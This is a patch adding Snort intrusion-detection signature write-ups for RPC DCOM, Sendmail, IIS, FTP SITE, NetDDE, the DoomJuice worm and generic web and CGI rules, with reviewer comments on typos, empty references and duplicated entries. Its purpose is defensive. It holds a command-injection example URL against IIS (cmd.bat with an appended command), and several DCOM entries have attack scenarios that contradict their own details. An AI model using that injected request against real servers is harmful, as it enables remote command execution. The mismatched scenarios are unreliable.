+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
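Review bot: "An virus" and "propogate" in Impact are typos. Detailed Information says the rule fires on "a filename extension commonly used by viruses" without naming the extension SID 2160 matches; a responder cannot judge the False Positives note ("A legitimate attachment to an email may generate this event") without it. There is a doubled blank line after the Sid value.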
--- /dev/null
+++ b/doc/signatures/1561.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1561
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
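Review bot: nothing in this document says what SID 1561 actually matches; Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion"), so a responder cannot tell which request or application triggered the event. Name the specific target. "attackers choosing" in Impact needs an apostrophe.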
--- /dev/null
+++ b/doc/signatures/2267.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2267
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
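Review bot: Affected Systems says "All systems using Sendmail" while Detailed Information limits the issue to Sendmail "prior to version 8.12.9"; the narrower statement belongs in Affected Systems. "verison" in Corrective Action is a typo, "process code of their choosing" in Attack Scenarios should be "execute code", and Additional References is empty for a vulnerability with a named fixed version.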
--- /dev/null
+++ b/doc/signatures/2193.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
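Review bot: the Attack Scenarios paragraph ('a request for a file with an overly long filename via a network share') does not describe the vulnerability documented in Detailed Information, which is a malformed DCOM request sent over RPC; rewrite the scenario to match, otherwise an analyst reading the alert will look for SMB file-name activity that is not what the rule fires on. 'Expoit' under Ease of Attack and 'propogate' under Corrective Action are typos for 'Exploit' and 'propagate'.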
--- /dev/null
+++ b/doc/signatures/3186.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3186
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
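Review bot: the Attack Scenarios text about an overly long filename on a network share contradicts the Detailed Information above it, which describes a malformed RPC DCOM request; the scenario should describe the RPC request. Additional References is empty here although 2193.txt in this same patch documents the same vulnerability and lists the MS03-026 bulletin, the CVE entry and the Symantec write-up; carry those over. 'Expoit' under Ease of Attack is a typo for 'Exploit'.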
--- /dev/null
+++ b/doc/signatures/2295.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2295
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
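Review bot: Detailed Information has a comma splice ('...when handling user input, this may lead...') that should be split into two sentences, and 'php files' should be 'PHP files' to match the capitalisation used elsewhere in the entry. 'attackers choosing' under Impact needs the possessive 'attacker's'. Additional References is empty although the Summary names a specific product and version (Proxy2.de Advanced Poll 2.0.2); the entry should cite the advisory for that issue so the reader can confirm which release fixes it.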
--- /dev/null
+++ b/doc/signatures/830.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+830
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
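Review bot: the Summary and Detailed Information never say which CGI script or request pattern this sid matches; 'a CGI web application' applies to every web rule, so the entry gives an analyst nothing to distinguish this alert from any other. Name the script the rule looks for, as the application-specific entries in this patch do (100000519.txt names the script and the parameter). 'ona web server' should be 'on a web server', and 'attackers choosing' (Impact and Detailed Information) needs the possessive.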
--- /dev/null
+++ b/doc/signatures/3362.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3362
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
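Review bot: this file is word-for-word identical to 3186.txt in this patch, including the Attack Scenarios/Detailed Information mismatch (an overly long filename on a network share versus a malformed RPC DCOM request), the 'Expoit' typo and the empty Additional References section. If 3362 and 3186 are distinct rules for the same vulnerability, the Summary of each should say which transport or request variant it covers; the shared text needs fixing in every copy.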
--- /dev/null
+++ b/doc/signatures/1277.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1277
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypupdated is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypupdated is using.  Attackers can also learn what versions of the ypupdated protocol are accepted by ypupdated.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypupdated run.  The ypupdated RPC service allows clients to update maps for Network Information Service (NIS), formerly known as Sun Yellow Pages.  A vulnerability exists with improper validation associated with the 'make' command used to update changes, allowing the execution of arbitrary commands as root.  
+
+--
+Affected Systems:
+HP HP-UX 10.1, 10.10, 10.20
+IBM AIX 3.2, 4.1
+NEC EWS-UX/V, UP-UX/V 
+SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3,4.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3, 6.0.1
+Sun SunOS 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypupdated runs.  This may be a precursor to accessing ypupdated.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypupdated, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypupdated, not probes of the ypupdated service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypupdated service itself. An attacker may attempt to go directly to the ypupdated port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1749
+
+CERT
+http://www.cert.org/advisories/CA-1995-17.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS125
+
+--
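Review bot: under Affected Systems the IRIX list reads '3.3.3,4.0' with the space missing after the comma, and the NEC line and the 'Arachnids' reference heading carry trailing whitespace. The rest of the entry is in good shape: False Negatives states exactly what the rule does and does not observe (portmapper queries, not direct access to the ypupdated port), and the references are filled in.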
--- /dev/null
+++ b/doc/signatures/1764.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1764
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
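Review bot: this file duplicates 830.txt verbatim, so it has the same problem: neither Summary nor Detailed Information names the CGI script or request the rule matches, and nothing in the text tells an analyst how sid 1764 differs from sid 830. Each entry should name what its rule looks for. 'ona web server' should be 'on a web server', and 'attackers choosing' needs the possessive.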
--- /dev/null
+++ b/doc/signatures/1529.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1529
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow or denial of service vulnerability associated with FTP SITE command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a
+denial of service or allow remote execution of arbitrary commands with
+privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various
+vulnerabilities associated with the FTP SITE command of different FTP
+servers. The Windows Serv-U FTP server 2.5a can be made to crash when an
+overly long argument is supplied to the SITE PASS command. The GuildFTPd
+free Windows FTP server 0.97 is vulnerable to a buffer overflow caused
+by issuing a SITE command that is 261 bytes or longer. A buffer overflow
+exists in Debian Linux 2.2 FTP daemon that is caused by issuing a SITE
+command that is 400 bytes or longer. The buffer overflow attacks may
+permit the execution of arbitrary commands with the privileges of the
+process running the FTP server. All of these attacks require login
+access to the vulnerable server via an authenticated or anonymous user.
+
+--
+Affected Systems:
+	Serv-U FTP server 2.5a.
+	GuildFTPd Server 0.97.
+	Debian 2.2 FTP server.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable FTP server and enter an overly
+long file argument with the SITE command, causing a denial of service or
+buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
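Review bot: the Summary should read 'associated with the FTP SITE command', and 'may login' under Attack Scenarios should be 'may log in'. Additional References is empty although Detailed Information quotes specific products, versions and byte thresholds (261 bytes for GuildFTPd 0.97, 400 bytes for the Debian 2.2 FTP daemon, the Serv-U 2.5a SITE PASS crash); cite the advisories those figures were taken from so they can be verified. 'Simple.  ' and the Brian Caswell contributor line carry trailing whitespace.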
--- /dev/null
+++ b/doc/signatures/2967.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2967
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
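Review bot: the Impact line and the first Corrective Action line both lack a terminating period ('...system level privileges', '...vendor supplied patches'). Detailed Information says the service is not started by default; it would help triage to state under False Positives or Corrective Action that the network vector only exists on hosts where NetDDE has been enabled, so an alert against a host that does not run the service can be assessed accordingly.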
--- /dev/null
+++ b/doc/signatures/119-13.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-13
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of a newline "\n" character as a delimeter. This is non-standard but
+is accepted by both Apache and IIS web servers.
+
+--
+Affected Systems:
+	All web servers
+
+--
+Attack Scenarios: 
+An attacker may supply the newline character as the delimeter in a web
+request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
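Review bot: 'delimeter' appears twice (Detailed Information and Attack Scenarios) and should be 'delimiter'. Between the separator that ends False Negatives and 'Corrective Action:' there is a stray blank line, which breaks the '--' / heading layout every other entry uses; drop it. Several separators in this file are written '-- ' with a trailing space. Impact is given as 'Unknown', yet the cited reference is titled 'HTTP IDS Evasions Revisited' and Detailed Information says the newline delimiter is non-standard but accepted by Apache and IIS; the Impact should say that the traffic may be an attempt to evade HTTP inspection, which is what the preprocessor is flagging.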
--- /dev/null
+++ b/doc/signatures/3241.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3241
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
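Review bot: another verbatim copy of 3186.txt, carrying the same defects: the Attack Scenarios text (overly long filename on a network share) does not match the malformed RPC DCOM request described in Detailed Information, 'Expoit' is a typo, and Additional References is empty. The Summary should state what distinguishes sid 3241 from 3186, 3362 and 3328, and the shared text should be corrected in all of them.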
--- /dev/null
+++ b/doc/signatures/2375.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+2375
+
+--
+Summary:
+This event is generated when activity from the worm DoomJuice is
+detected. 
+
+--
+Impact:
+This is indicative of worm activity which may launch of a Denial of
+Service condition against Microsoft from infected machines.
+
+--
+Detailed Information:
+This event is indicative of activity by the DoomJuice worm. This worm
+attempts to connect to random addresses on port 3127, if it receives a
+response it will attempt to upload a copy of itself to the target
+machine. If no response is received on that port, it will try on ports
+between 3127 and 3199.
+
+If the date is between February 8th and February 28th 2004, the worm
+will attempt to launch a Denial of Service (DoS) attack against
+www.microsoft.com.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows Me
+	Windows NT
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+It is possible to edit the binary data in the executable to create a
+variant of the worm. This may evade the rule.
+
+--
+Corrective Action:
+Use Anti-Virus software to remove the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
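Review bot: Impact reads 'which may launch of a Denial of Service condition'; drop 'of'. The first sentence of Detailed Information is a comma splice ('...on port 3127, if it receives a response...') and should be split at the comma. 'Rule:  ' carries trailing spaces and 'None Known' under False Positives lacks a period. Additional References is empty although the entry gives dates, port ranges and a named DoS target for the worm; cite the anti-virus write-up those details came from, as 2193.txt does for Blaster.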
--- /dev/null
+++ b/doc/signatures/100000519.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000519
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VUBB" application running on a webserver. Access to the 
+file "index.php" with SQL commands being passed as the "user" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "user" parameter in the "index.php" script used by the 
+"VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
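Review bot: the blank line before the '--' separator is missing after the Sid value, after Affected Systems and after Contributors, and there is an extra blank line after the final separator, so this file does not follow the layout of the other entries. In Detailed Information the third paragraph is the generic CGI credential-validation boilerplate and it comes after the specific SQL injection text; it describes a different weakness (weak credential checks, not unsanitised input reaching the database) and should be dropped or moved ahead of the specific description. 'exploitation attempt has been attempted' in the Summary is redundant ('an exploitation attempt has been made'), 'ona web server' should be 'on a web server', and 'attackers choosing' needs the possessive.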
--- /dev/null
+++ b/doc/signatures/3194.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3194
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Information Server.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+on the target host.
+
+--
+Detailed Information:
+Microsoft IIS contains a programming error that may allow an attacker to
+execute commands of their choosing on a vulnerable system. If a valid
+request for an executable file on the system is made, the server will
+honor the request and execute any commands sent to the system. It may be
+possible for an attacker to execute system commands sent to cmd.exe or
+an executable batch file (.bat) for example.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can send a request to an executable file on the system and
+supply command arguments of their choice to the file. The server will
+honor the request and execute the attackers commands.
+
+For example, http://www.target.com/scripts/cmd.bat"+&+somecommand
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
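Review bot: the example URL under Attack Scenarios uses www.target.com, a live third-party domain; documentation examples should use a reserved name such as example.com (RFC 2606) so that nobody copying the example sends requests to someone else's host. 'the attackers commands' needs the possessive. Additional References is empty for a specific IIS 4.0/5.0 command execution issue; list the vendor bulletin, as 2967.txt does with MS04-031.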
--- /dev/null
+++ b/doc/signatures/1091.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1091
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
